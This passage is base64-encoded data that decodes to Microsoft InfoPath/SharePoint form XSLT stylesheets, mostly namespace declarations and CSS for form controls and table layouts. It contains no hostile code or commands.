zbDp2YXJpYWJsZT4NCgkJCQkJPHhzbDphcHBseS10ZW1wbGF0ZXMgc2VsZWN0PSJtc3hzbDpub2RlLXNldCgkdmFyKS8qIiBtb2RlPSJfMSIvPg0KCQkJCTwveHNsOm90aGVyd2lzZT4NCgkJCTwveHNsOmNob29zZT4NCgkJCTx4c2w6Y2hvb3NlPg0KCQkJCTx4c2w6d2hlbiB0ZXN0PSJkZnM6ZGF0YUZpZWxkcyI+DQoJCQkJCTx4c2w6YXBwbHktdGVtcGxhdGVzIHNlbGVjdD0iZGZzOmRhdGFGaWVsZHNbMV0iIG1vZGU9Il8zIi8+DQoJCQkJPC94c2w6d2hlbj4NCgkJCQk8eHNsOm90aGVyd2lzZT4NCgkJCQkJPHhzbDp2YXJpYWJsZSBuYW1lPSJ2YXIiPg0KCQkJCQkJPHhzbDplbGVtZW50IG5hbWU9ImRmczpkYXRhRmllbGRzIi8+DQoJCQkJCTwveHNsOnZhcmlhYmxlPg0KCQkJCQk8eHNsOmFwcGx5LXRlbXBsYXRlcyBzZWxlY3Q9Im1zeHNsOm5vZGUtc2V0KCR2YXIpLyoiIG1vZGU9Il8zIi8+DQoJCQkJPC94c2w6b3RoZXJ3aXNlPg0KCQkJPC94c2w6Y2hvb3NlPg0KCQkJPHhzbDpjb3B5LW9mIHNlbGVjdD0iKltuYW1lc3BhY2UtdXJpKCkgPSAnaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwMy9hZG9tYXBwaW5nJyBvciBuYW1lc3BhY2UtdXJpKCkgPSAnaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwMy9jaGFuZ2VUcmFja2luZyddIi8+DQoJCTwveHNsOmNvcHk+DQoJPC94c2w6dGVtcGxhdGU+DQo8L3hzbDpzdHlsZXNoZWV0Pjw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IlVURi04Ij8+DQo8eHNsOnN0eWxlc2hlZXQgdmVyc2lvbj0iMS4wIiB4bWxuczptYT0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvMjAwOS9tZXRhZGF0YS9wcm9wZXJ0aWVzL21ldGFBdHRyaWJ1dGVzIiB4bWxuczp4c2k9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNlIiB4bWxuczpkZnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vb2ZmaWNlL2luZm9wYXRoLzIwMDMvZGF0YUZvcm1Tb2x1dGlvbiIgeG1sbnM6bXk9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vb2ZmaWNlL2luZm9wYXRoLzIwMDkvV1NTTGlzdC9jbWVEYXRhRmllbGRzIiB4bWxuczpkPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDA5L1dTU0xpc3QvZGF0YUZpZWxkcyIgeG1sbnM6cGM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vb2ZmaWNlL2luZm9wYXRoLzIwMDcvUGFydG5lckNvbnRyb2xzIiB4bWxuczpxPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDA5L1dTU0xpc3QvcXVlcnlGaWVsZHMiIHhtbG5zOmRtcz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvMjAwOS9kb2N1bWVudE1hbmFnZW1lbnQvdHlwZXMiIHhtbG5zOnhkPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDAzIiB4bWxuczp4c2w9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvWFNML1RyYW5zZm9ybSIgeG1sbnM6bXN4c2w9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206eHNsdCIgeG1sbnM6eD0idXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTpvZmZpY2U6ZXhjZWwiIHhtbG5zOnhkRXh0ZW5zaW9uPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDAzL3hzbHQvZXh0ZW5zaW9uIiB4bWxuczp4ZFhEb2N1bWVudD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwMy94c2x0L3hEb2N1bWVudCIgeG1sbnM6eGRTb2x1dGlvbj0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwMy94c2x0L3NvbHV0aW9uIiB4bWxuczp4ZEZvcm1hdHRpbmc9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vb2ZmaWNlL2luZm9wYXRoLzIwMDMveHNsdC9mb3JtYXR0aW5nIiB4bWxuczp4ZEltYWdlPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDAzL3hzbHQveEltYWdlIiB4bWxuczp4ZFV0aWw9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vb2ZmaWNlL2luZm9wYXRoLzIwMDMveHNsdC9VdGlsIiB4bWxuczp4ZE1hdGg9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vb2ZmaWNlL2luZm9wYXRoLzIwMDMveHNsdC9NYXRoIiB4bWxuczp4ZERhdGU9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vb2ZmaWNlL2luZm9wYXRoLzIwMDMveHNsdC9EYXRlIiB4bWxuczpzaWc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyMiIHhtbG5zOnhkU2lnbmF0dXJlUHJvcGVydGllcz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwMy9TaWduYXR1cmVQcm9wZXJ0aWVzIiB4bWxuczppcEFwcD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwNi9YUGF0aEV4dGVuc2lvbi9pcEFwcCIgeG1sbnM6eGRFbnZpcm9ubWVudD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwNi94c2x0L2Vudmlyb25tZW50IiB4bWxuczp4ZFVzZXI9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vb2ZmaWNlL2luZm9wYXRoLzIwMDYveHNsdC9Vc2VyIiB4bWxuczp4ZFNlcnZlckluZm89Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vb2ZmaWNlL2luZm9wYXRoLzIwMDkveHNsdC9TZXJ2ZXJJbmZvIj4NCgk8eHNsOm91dHB1dCBtZXRob2Q9Imh0bWwiIGluZGVudD0ibm8iLz4NCgk8eHNsOnRlbXBsYXRlIG1hdGNoPSJkZnM6bXlGaWVsZHMiPg0KCQk8aHRtbCBkaXI9Imx0ciIgeG1sbnM6eHNmPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL29mZmljZS9pbmZvcGF0aC8yMDAzL3NvbHV0aW9uRGVmaW5pdGlvbiIgeG1sbnM6eHNmMj0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwNi9zb2x1dGlvbkRlZmluaXRpb24vZXh0ZW5zaW9ucyIgeG1sbnM6eHNmMz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS9vZmZpY2UvaW5mb3BhdGgvMjAwOS9zb2x1dGlvbkRlZmluaXRpb24vZXh0ZW5zaW9ucyIgeG1sbnM6eHNkPSJodHRwOi8vd3d3LnczLm9yZy8yMDAxL1hNTFNjaGVtYSIgeG1sbnM6eGh0bWw9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPg0KCQkJPGhlYWQ+DQoJCQkJPG1ldGEgY29udGVudD0idGV4dC9odG1sIiBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiPjwvbWV0YT4NCgkJCQk8c3R5bGUgY29udHJvbFN0eWxlPSJjb250cm9sU3R5bGUiPkBtZWRpYSBzY3JlZW4gCQkJeyAJCQlCT0RZe21hcmdpbi1sZWZ0OjIxcHg7YmFja2dyb3VuZC1wb3NpdGlvbjoyMXB4IDBweDt9IAkJCX0gCQlCT0RZe2NvbG9yOndpbmRvd3RleHQ7YmFja2dyb3VuZC1jb2xvcjp3aW5kb3c7bGF5b3V0LWdyaWQ6bm9uZTt9IAkJLnhkTGlzdEl0ZW0ge2Rpc3BsYXk6aW5saW5lLWJsb2NrO3dpZHRoOjEwMCU7dmVydGljYWwtYWxpZ246dGV4dC10b3A7fSAJCS54ZExpc3RCb3gsLnhkQ29tYm9Cb3h7bWFyZ2luOjFweDt9IAkJLnhkSW5saW5lUGljdHVyZXttYXJnaW46MXB4OyBCRUhBVklPUjogdXJsKCNkZWZhdWx0I3Vybjo6eGRQaWN0dXJlKSB9IAkJLnhkTGlua2VkUGljdHVyZXttYXJnaW46MXB4OyBCRUhBVklPUjogdXJsKCNkZWZhdWx0I3Vybjo6eGRQaWN0dXJlKSB1cmwoI2RlZmF1bHQjdXJuOjpjb250cm9scy9CaW5kZXIpIH0gCQkueGRIeXBlcmxpbmtCb3h7d29yZC13cmFwOmJyZWFrLXdvcmQ7IHRleHQtb3ZlcmZsb3c6ZWxsaXBzaXM7b3ZlcmZsb3cteDpoaWRkZW47IE9WRVJGTE9XLVk6IGhpZGRlbjsgV0hJVEUtU1BBQ0U6bm93cmFwOyBkaXNwbGF5OmlubGluZS1ibG9jazttYXJnaW46MXB4O3BhZGRpbmc6NXB4O2JvcmRlcjogMXB0IHNvbGlkICNkY2RjZGM7Y29sb3I6d2luZG93dGV4dDtCRUhBVklPUjogdXJsKCNkZWZhdWx0I3Vybjo6Y29udHJvbHMvQmluZGVyKSB1cmwoI2RlZmF1bHQjRGF0YUJpbmRpbmdVSSl9IAkJLnhkU2VjdGlvbntib3JkZXI6MXB0IHNvbGlkIHRyYW5zcGFyZW50IDttYXJnaW46MHB4IDBweCAwcHggMHB4O3BhZGRpbmc6MHB4IDBweCAwcHggMHB4O30gCQkueGRSZXBlYXRpbmdTZWN0aW9ue2JvcmRlcjoxcHQgc29saWQgdHJhbnNwYXJlbnQ7bWFyZ2luOjBweCAwcHggMHB4IDBweDtwYWRkaW5nOjBweCAwcHggMHB4IDBweDt9IAkJLnhkTXVsdGlTZWxlY3RMaXN0e21hcmdpbjoxcHg7ZGlzcGxheTppbmxpbmUtYmxvY2s7IGJvcmRlcjoxcHQgc29saWQgI2RjZGNkYzsgcGFkZGluZzoxcHggMXB4IDFweCA1cHg7IHRleHQtaW5kZW50OjA7IGNvbG9yOndpbmRvd3RleHQ7IGJhY2tncm91bmQtY29sb3I6d2luZG93OyBvdmVyZmxvdzphdXRvOyBiZWhhdmlvcjogdXJsKCNkZWZhdWx0I0RhdGFCaW5kaW5nVUkpIHVybCgjZGVmYXVsdCN1cm46OmNvbnRyb2xzL0JpbmRlcikgdXJsKCNkZWZhdWx0I011bHRpU2VsZWN0SGVscGVyKSB1cmwoI2RlZmF1bHQjU2Nyb2xsYWJsZVJlZ2lvbik7fSAJCS54ZE11bHRpU2VsZWN0TGlzdEl0ZW17ZGlzcGxheTpibG9jazt3aGl0ZS1zcGFjZTpub3dyYXB9CQkueGRNdWx0aVNlbGVjdEZpbGxJbntkaXNwbGF5OmlubGluZS1ibG9jazt3aGl0ZS1zcGFjZTpub3dyYXA7dGV4dC1vdmVyZmxvdzplbGxpcHNpczs7cGFkZGluZzoxcHg7bWFyZ2luOjFweDtib3JkZXI6IDFwdCBzb2xpZCAjZGNkY2RjO292ZXJmbG93OmhpZGRlbjt0ZXh0LWFsaWduOmxlZnQ7fQkJLnhkQmVoYXZpb3JfRm9ybWF0dGluZyB7QkVIQVZJT1I6IHVybCgjZGVmYXVsdCN1cm46OmNvbnRyb2xzL0JpbmRlcikgdXJsKCNkZWZhdWx0I0Zvcm1hdHRpbmcpO30gCSAueGRCZWhhdmlvcl9Gb3JtYXR0aW5nTm9CVUl7QkVIQVZJT1I6IHVybCgjZGVmYXVsdCNDYWxQb3B1cCkgdXJsKCNkZWZhdWx0I3Vybjo6Y29udHJvbHMvQmluZGVyKSB1cmwoI2RlZmF1bHQjRm9ybWF0dGluZyk7fSAJLnhkRXhwcmVzc2lvbkJveHttYXJnaW46IDFweDtwYWRkaW5nOjFweDt3b3JkLXdyYXA6IGJyZWFrLXdvcmQ7dGV4dC1vdmVyZmxvdzogZWxsaXBzaXM7b3ZlcmZsb3cteDpoaWRkZW47fS54ZEJlaGF2aW9yX0dob3N0ZWRUZXh0LC54ZEJlaGF2aW9yX0dob3N0ZWRUZXh0Tm9CVUl7QkVIQVZJT1I6IHVybCgjZGVmYXVsdCN1cm46OmNvbnRyb2xzL0JpbmRlcikgdXJsKCNkZWZhdWx0I1RleHRGaWVsZCkgdXJsKCNkZWZhdWx0I0dob3N0ZWRUZXh0KTt9CS54ZEJlaGF2aW9yX0dURm9ybWF0dGluZ3tCRUhBVklPUjogdXJsKCNkZWZhdWx0I3Vybjo6Y29udHJvbHMvQmluZGVyKSB1cmwoI2RlZmF1bHQjRm9ybWF0dGluZykgdXJsKCNkZWZhdWx0I0dob3N0ZWRUZXh0KTt9CS54ZEJlaGF2aW9yX0dURm9ybWF0dGluZ05vQlVJe0JFSEFWSU9SOiB1cmwoI2RlZmF1bHQjQ2FsUG9wdXApIHVybCgjZGVmYXVsdCN1cm46OmNvbnRyb2xzL0JpbmRlcikgdXJsKCNkZWZhdWx0I0Zvcm1hdHRpbmcpIHVybCgjZGVmYXVsdCNHaG9zdGVkVGV4dCk7fQkueGRCZWhhdmlvcl9Cb29sZWFue0JFSEFWSU9SOiB1cmwoI2RlZmF1bHQjdXJuOjpjb250cm9scy9CaW5kZXIpIHVybCgjZGVmYXVsdCNCb29sZWFuSGVscGVyKTt9CS54ZEJlaGF2aW9yX1NlbGVjdHtCRUhBVklPUjogdXJsKCNkZWZhdWx0I3Vybjo6Y29udHJvbHMvQmluZGVyKSB1cmwoI2RlZmF1bHQjU2VsZWN0SGVscGVyKTt9CS54ZEJlaGF2aW9yX0NvbWJvQm94e0JFSEFWSU9SOiB1cmwoI2RlZmF1bHQjQ29tYm9Cb3gpfSAJLnhkQmVoYXZpb3JfQ29tYm9Cb3hUZXh0RmllbGR7QkVIQVZJT1I6IHVybCgjZGVmYXVsdCNDb21ib0JveFRleHRGaWVsZCk7fSAJLnhkUmVwZWF0aW5nVGFibGV7Qk9SREVSLVRPUC1TVFlMRTogbm9uZTsgQk9SREVSLVJJR0hULVNUWUxFOiBub25lOyBCT1JERVItTEVGVC1TVFlMRTogbm9uZTsgQk9SREVSLUJPVFRPTS1TVFlMRTogbm9uZTsgQk9SREVSLUNPTExBUFNFOiBjb2xsYXBzZTsgV09SRC1XUkFQOiBicmVhay13b3JkO30ueGRTY3JvbGxhYmxlUmVnaW9ue0JFSEFWSU9SOiB1cmwoI2RlZmF1bHQjU2Nyb2xsYWJsZVJlZ2lvbik7fSAJCS54ZExheW91dFJlZ2lvbntkaXNwbGF5OmlubGluZS1ibG9jazt9IAkJLnhkTWFzdGVye0JFSEFWSU9SOiB1cmwoI2RlZmF1bHQjTWFzdGVySGVscGVyKTt9IAkJLnhkQWN0aXZlWHttYXJnaW46MXB4OyBCRUhBVklPUjogdXJsKCNkZWZhdWx0I0FjdGl2ZVgpO30gCQkueGRGaWxlQXR0YWNobWVudHtkaXNwbGF5OmlubGluZS1ibG9jazttYXJnaW46MXB4O0JFSEFWSU9SOnVybCgjZGVmYXVsdCN1cm46OnhkRmlsZUF0dGFjaG1lbnQpO30gCQkueGRTaGFyZVBvaW50RmlsZUF0dGFjaG1lbnR7ZGlzcGxheTppbmxpbmUtYmxvY2s7bWFyZ2luOjJweDtCRUhBVklPUjp1cmwoI2RlZmF1bHQjeGRTaGFyZVBvaW50RmlsZUF0dGFjaG1lbnQpO30gCQkueGRBdHRhY2hJdGVte2Rpc3BsYXk6aW5saW5lLWJsb2NrO3dpZHRoOjEwMCUlO2hlaWdodDoyNXB4O21hcmdpbjoxcHg7QkVIQVZJT1I6dXJsKCNkZWZhdWx0I3hkU2hhcmVQb2ludEZpbGVBdHRhY2hJdGVtKTt9IAkJLnhkU2lnbmF0dXJlTGluZXtkaXNwbGF5OmlubGluZS1ibG9jazttYXJnaW46MXB4O2JhY2tncm91bmQtY29sb3I6dHJhbnNwYXJlbnQ7Ym9yZGVyOjFwdCBzb2xpZCB0cmFuc3BhcmVudDtCRUhBVklPUjp1cmwoI2RlZmF1bHQjU2lnbmF0dXJlTGluZSk7fSAJCS54ZEh5cGVybGlua0JveENsaWNrYWJsZXtiZWhhdmlvcjogdXJsKCNkZWZhdWx0I0h5cGVybGlua0JveCl9IAkJLnhkSHlwZXJsaW5rQm94QnV0dG9uQ2xpY2thYmxle2JvcmRlci13aWR0aDoxcHg7Ym9yZGVyLXN0eWxlOm91dHNldDtiZWhhdmlvcjogdXJsKCNkZWZhdWx0I0h5cGVybGlua0JveEJ1dHRvbil9IAkJLnhkUGljdHVyZUJ1dHRvbntiYWNrZ3JvdW5kLWNvbG9yOiB0cmFuc3BhcmVudDsgcGFkZGluZzogMHB4OyBiZWhhdmlvcjogdXJsKCNkZWZhdWx0I1BpY3R1cmVCdXR0b24pO30gCQkueGRQYWdlQnJlYWt7ZGlzcGxheTogbm9uZTt9Qk9EWXttYXJnaW4tcmlnaHQ6MjFweDt9IAkJLnhkVGV4dEJveFJUTHtkaXNwbGF5OmlubGluZS1ibG9jazt3aGl0ZS1zcGFjZTpub3dyYXA7dGV4dC1vdmVyZmxvdzplbGxpcHNpczs7cGFkZGluZzoxcHg7bWFyZ2luOjFweDtib3JkZXI6IDFwdCBzb2xpZCAjZGNkY2RjO2NvbG9yOndpbmRvd3RleHQ7YmFja2dyb3VuZC1jb2xvcjp3aW5kb3c7b3ZlcmZsb3c6aGlkZGVuO3RleHQtYWxpZ246cmlnaHQ7d29yZC13cmFwOm5vcm1hbDt9IAkJLnhkUmljaFRleHRCb3hSVEx7ZGlzcGxheTppbmxpbmUtYmxvY2s7O3BhZGRpbmc6MXB4O21hcmdpbjoxcHg7Ym9yZGVyOiAxcHQgc29saWQgI2RjZGNkYztjb2xvcjp3aW5kb3d0ZXh0O2JhY2tncm91bmQtY29sb3I6d2luZG93O292ZXJmbG93LXg6aGlkZGVuO3dvcmQtd3JhcDpicmVhay13b3JkO3RleHQtb3ZlcmZsb3c6ZWxsaXBzaXM7dGV4dC1hbGlnbjpyaWdodDtmb250LXdlaWdodDpub3JtYWw7Zm9udC1zdHlsZTpub3JtYWw7dGV4dC1kZWNvcmF0aW9uOm5vbmU7dmVydGljYWwtYWxpZ246YmFzZWxpbmU7fSAJCS54ZERUVGV4dFJUTHtoZWlnaHQ6MTAwJTt3aWR0aDoxMDAlO21hcmdpbi1sZWZ0OjIycHg7b3ZlcmZsb3c6aGlkZGVuO3BhZGRpbmc6MHB4O3doaXRlLXNwYWNlOm5vd3JhcDt9IAkJLnhkRFRCdXR0b25SVEx7bWFyZ2luLXJpZ2h0Oi0yMXB4O2hlaWdodDoxN3B4O3dpZHRoOjIwcHg7YmVoYXZpb3I6IHVybCgjZGVmYXVsdCNEVFBpY2tlcik7fSAJCS54ZE11bHRpU2VsZWN0RmlsbGluUlRMe2Rpc3BsYXk6aW5saW5lLWJsb2NrO3doaXRlLXNwYWNlOm5vd3JhcDt0ZXh0LW92ZXJmbG93OmVsbGlwc2lzOztwYWRkaW5nOjFweDttYXJnaW46MXB4O2JvcmRlcjogMXB0IHNvbGlkICNkY2RjZGM7b3ZlcmZsb3c6aGlkZGVuO3RleHQtYWxpZ246cmlnaHQ7fS54ZFRleHRCb3h7ZGlzcGxheTppbmxpbmUtYmxvY2s7d2hpdGUtc3BhY2U6bm93cmFwO3RleHQtb3ZlcmZsb3c6ZWxsaXBzaXM7O3BhZGRpbmc6MXB4O21hcmdpbjoxcHg7Ym9yZGVyOiAxcHQgc29saWQgI2RjZGNkYztjb2xvcjp3aW5kb3d0ZXh0O2JhY2tncm91bmQtY29sb3I6d2luZG93O292ZXJmbG93OmhpZGRlbjt0ZXh0LWFsaWduOmxlZnQ7d29yZC13cmFwOm5vcm1hbDt9IAkJLnhkUmljaFRleHRCb3h7ZGlzcGxheTppbmxpbmUtYmxvY2s7O3BhZGRpbmc6MXB4O21hcmdpbjoxcHg7Ym9yZGVyOiAxcHQgc29saWQgI2RjZGNkYztjb2xvcjp3aW5kb3d0ZXh0O2JhY2tncm91bmQtY29sb3I6d2luZG93O292ZXJmbG93LXg6aGlkZGVuO3dvcmQtd3JhcDpicmVhay13b3JkO3RleHQtb3ZlcmZsb3c6ZWxsaXBzaXM7dGV4dC1hbGlnbjpsZWZ0O2ZvbnQtd2VpZ2h0Om5vcm1hbDtmb250LXN0eWxlOm5vcm1hbDt0ZXh0LWRlY29yYXRpb246bm9uZTt2ZXJ0aWNhbC1hbGlnbjpiYXNlbGluZTt9IAkJLnhkRFRQaWNrZXJ7O2Rpc3BsYXk6aW5saW5lO21hcmdpbjoxcHg7bWFyZ2luLWJvdHRvbTogMnB4O2JvcmRlcjogMXB0IHNvbGlkICNkY2RjZGM7Y29sb3I6d2luZG93dGV4dDtiYWNrZ3JvdW5kLWNvbG9yOndpbmRvdztvdmVyZmxvdzpoaWRkZW47dGV4dC1pbmRlbnQ6MDsgbGF5b3V0LWdyaWQ6IG5vbmV9IAkJLnhkRFRUZXh0e2hlaWdodDoxMDAlO3dpZHRoOjEwMCU7bWFyZ2luLXJpZ2h0OjIycHg7b3ZlcmZsb3c6aGlkZGVuO3BhZGRpbmc6MHB4O3doaXRlLXNwYWNlOm5vd3JhcDt9IAkJLnhkRFRCdXR0b257bWFyZ2luLWxlZnQ6LTIxcHg7aGVpZ2h0OjE3cHg7d2lkdGg6MjBweDtiZWhhdmlvcjogdXJsKCNkZWZhdWx0I0RUUGlja2VyKTt9IAkJLnhkUmVwZWF0aW5nVGFibGUgVEQge1ZFUlRJQ0FMLUFMSUdOOiB0b3A7fTwvc3R5bGU+DQoJCQkJPHN0eWxlIHRhYmxlRWRpdG9yPSJUYWJsZVN0eWxlUnVsZXNJRCI+VEFCTEUueGRMYXlvdXQgVEQgew0KCUJPUkRFUi1UT1A6IG1lZGl1bSBub25lOyBCT1JERVItUklHSFQ6IG1lZGl1bSBub25lOyBCT1JERVItQk9UVE9NOiBtZWRpdW0gbm9uZTsgQk9SREVSLUxFRlQ6IG1lZGl1bSBub25lDQp9DQpUQUJMRS5tc29VY1RhYmxlIFREIHsNCglCT1JERVItVE9QOiAxcHQgc29saWQ7IEJPUkRFUi1SSUdIVDogMXB0IHNvbGlkOyBCT1JERVItQk9UVE9NOiAxcHQgc29saWQ7IEJPUkRFUi1MRUZUOiAxcHQgc29saWQNCn0NClRBQkxFIHsNCglCRUhBVklPUjogdXJsICgjZGVmYXVsdCN1cm46OnRhYmxlcy9ORFRhYmxlKQ0KfQ0KPC9zdHlsZT4NCgkJCQk8c3R5bGUgdGhlbWVTdHlsZT0idXJuOm9mZmljZS5taWNyb3NvZnQuY29tOnRoZW1lT2ZmaWNlIj5UQUJMRSB7Qk9SREVSLVJJR0hUOiBtZWRpdW0gbm9uZTsgQk9SREVSLVRPUDogbWVkaXVtIG5vbmU7IEJPUkRFUi1MRUZUOiBtZWRpdW0gbm9uZTsgQk9SREVSLUJPVFRPTTogbWVkaXVtIG5vbmU7IEJPUkRFUi1DT0xMQVBTRTogY29sbGFwc2V9VEQge0JPUkRFUi1MRUZULUNPTE9SOiAjZDhkOGQ4OyBCT1JERVItQk9UVE9NLUNPTE9SOiAjZDhkOGQ4OyBCT1JERVItVE9QLUNPTE9SOiAjZDhkOGQ4OyBCT1JERVItUklHSFQtQ09MT1I6ICNkOGQ4ZDh9VEgge0JPUkRFUi1MRUZULUNPTE9SOiAjMDAwMDAwOyBCT1JERVItQk9UVE9NLUNPTE9SOiAjMDAwMDAwOyBDT0xPUjogYmxhY2s7IEJPUkRFUi1UT1AtQ09MT1I6ICMwMDAwMDA7IEJBQ0tHUk9VTkQtQ09MT1I6ICNmMmYyZjI7IEJPUkRFUi1SSUdIVC1DT0xPUjogIzAwMDAwMH0ueGRUYWJsZUhlYWRlciB7Q09MT1I6IGJsYWNrOyBCQUNLR1JPVU5ELUNPTE9SOiAjZjJmMmYyfS5saWdodDEge0JBQ0tHUk9VTkQtQ09MT1I6ICNmZmZmZmZ9LmRhcmsxIHtCQUNLR1JPVU5ELUNPTE9SOiAjMDAwMDAwfS5saWdodDIge0JBQ0tHUk9VTkQtQ09MT1I6ICNmNWY2Zjd9LmRhcmsyIHtCQUNLR1JPVU5ELUNPTE9SOiAjMTgyNzM4fS5hY2NlbnQxIHtCQUNLR1JPVU5ELUNPTE9SOiAjMDA3MmJjfS5hY2NlbnQyIHtCQUNLR1JPVU5ELUNPTE9SOiAjZWMwMDhjfS5hY2NlbnQzIHtCQUNLR1JPVU5ELUNPTE9SOiAjMDBhZGVlfS5hY2NlbnQ0IHtCQUNLR1JPVU5ELUNPTE9SOiAjZmQ5ZjA4fS5hY2NlbnQ1IHtCQUNLR1JPVU5ELUNPTE9SOiAjMzZiMDAwfS5hY2NlbnQ2IHtCQUNLR1JPVU5ELUNPTE9SOiAjZmFlMDMyfTwvc3R5bGU+DQoJCQkJPHN0eWxlIHRhYmxlU3R5bGU9IlNoYXJlUG9pbnQiPlRSLnhkVGl0bGVSb3cge01JTi1IRUlHSFQ6IDU4cHh9VEQueGRUaXRsZUNlbGwge0JPUkRFUi1SSUdIVDogI2Q4ZDhkOCAxcHQgc29saWQ7IFBBRERJTkctUklHSFQ6IDIycHg7IEJPUkRFUi1UT1A6ICNkOGQ4ZDggMXB0IHNvbGlkOyBQQURESU5HLUxFRlQ6IDIycHg7IFBBRERJTkctQk9UVE9NOiA2cHg7IEJPUkRFUi1MRUZUOiAjZDhkOGQ4IDFwdCBzb2xpZDsgUEFERElORy1UT1A6IDE4cHg7IEJBQ0tHUk9VTkQtQ09MT1I6ICNmZmZmZmZ9VFIueGRUaXRsZVJvd1dpdGhIZWFkaW5nIHtNSU4tSEVJR0hUOiA1OHB4fVRELnhkVGl0bGVDZWxsV2l0aEhlYWRpbmcge0JPUkRFUi1SSUdIVDogI2Q4ZDhkOCAxcHQgc29saWQ7IFBBRERJTkctUklHSFQ6IDIycHg7IEJPUkRFUi1UT1A6ICNkOGQ4ZDggMXB0IHNvbGlkOyBQQURESU5HLUxFRlQ6IDIycHg7IFBBRERJTkctQk9UVE9NOiA0cHg7IEJPUkRFUi1MRUZUOiAjZDhkOGQ4IDFwdCBzb2xpZDsgUEFERElORy1UT1A6IDE4cHg7IEJBQ0tHUk9VTkQtQ09MT1I6ICNmZmZmZmZ9VFIueGRUaXRsZVJvd1dpdGhTdWJIZWFkaW5nIHtNSU4tSEVJR0hUOiA1OHB4fVRELnhkVGl0bGVDZWxsV2l0aFN1YkhlYWRpbmcge0JPUkRFUi1SSUdIVDogI2Q4ZDhkOCAxcHQgc29saWQ7IFBBRERJTkctUklHSFQ6IDIycHg7IEJPUkRFUi1UT1A6ICNkOGQ4ZDggMXB0IHNvbGlkOyBQQURESU5HLUxFRlQ6IDIycHg7IFBBRERJTkctQk9UVE9NOiA0cHg7IEJPUkRFUi1MRUZUOiAjZDhkOGQ4IDFwdCBzb2xpZDsgUEFERElORy1UT1A6IDE4cHg7IEJBQ0tHUk9VTkQtQ09MT1I6ICNmZmZmZmZ9VFIueGRUaXRsZVJvd1dpdGhPZmZzZXRCb2R5IHtNSU4tSEVJR0hUOiA1OHB4fVRELnhkVGl0bGVDZWxsV2l0aE9mZnNldEJvZHkge0JPUkRFUi1SSUdIVDogI2Q4ZDhkOCAxcHQgc29saWQ7IFBBRERJTkctUklHSFQ6IDIycHg7IEJPUkRFUi1UT1A6ICNkOGQ4ZDggMXB0IHNvbGlkOyBQQURESU5HLUxFRlQ6IDIycHg7IFBBRERJTkctQk9UVE9NOiA2cHg7IEJPUkRFUi1MRUZUOiAjZDhkOGQ4IDFwdCBzb2xpZDsgUEFERElORy1UT1A6IDE4cHg7IEJBQ0tHUk9VTkQtQ09MT1I6ICNmZmZmZmZ9VFIueGRUaXRsZUhlYWRpbmdSb3cge01JTi1IRUlHSFQ6IDM4cHh9VEQueGRUaXRsZUhlYWRpbmdDZWxsIHtCT1JERVItUklHSFQ6ICNkOGQ4ZDggMXB0IHNvbGlkOyBQQURESU5HLVJJR0hUOiAyMnB4OyBQQURESU5HLUxFRlQ6IDIycHg7IFBBRERJTkctQk9UVE9NOiAxMnB4OyBCT1JERVItTEVGVDogI2Q4ZDhkOCAxcHQgc29saWQ7IFBBRERJTkctVE9QOiAwcHg7IEJBQ0tHUk9VTkQtQ09MT1I6ICNmZmZmZmY7IHZhbGlnbjogdG9wfVRSLnhkVGl0bGVTdWJoZWFkaW5nUm93IHtNSU4tSEVJR0hUOiA2N3B4fVRELnhkVGl0bGVTdWJoZWFkaW5nQ2VsbCB7Qk9SREVSLVJJR0hUOiAjZDhkOGQ4IDFwdCBzb2xpZDsgUEFERElORy1SSUdIVDogMjJweDsgQk9SREVSLVRPUDogIzI0M2I1NiAxcH